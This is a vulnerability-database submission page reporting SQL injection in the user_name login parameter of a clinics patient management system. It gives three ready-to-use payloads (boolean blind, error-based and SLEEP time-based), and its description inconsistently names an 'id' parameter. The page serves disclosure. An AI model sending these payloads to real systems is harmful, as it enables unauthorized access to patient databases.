Submit #94401: Sql injection exists in username parameter of clinics patient management systeminfo

TitleSql injection exists in username parameter of clinics patient management system
DescriptionSQL injection vulnerability exists in id parameter of index.php file of clinics patient management system.Using sqlmap to inject it, you can get the result of Boolean blind injection, which means that an ordinary user can obtain all the information in the database Payload:user_name=admin' AND 7611=7611 AND 'UDzF'='UDzF&password=admin123&login= or user_name=admin' AND GTID_SUBSET(CONCAT(0x716a7a7171,(SELECT (ELT(7705=7705,1))),0x717a6b6a71),7705) AND 'iREO'='iREO&password=admin123&login= or user_name=admin' AND (SELECT 6807 FROM (SELECT(SLEEP(5)))kKcA) AND 'YvzK'='YvzK&password=admin123&login=
Source⚠️ https://github.com/E1CHO/cve_hub/blob/main/clinics%20patient%20management%20system/clinics-patient-management-system%20vlun1.pdf
User
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
Submission02/25/2023 04:38 (3 years ago)
Moderation02/25/2023 08:51 (4 hours later)
StatusDuplicate
VulDB entry207847 [SourceCodester Clinics Patient Management System Login index.php user_name sql injection]
Points0

PreviousOverviewNext

Do you know our Splunk app?

Download it now for free!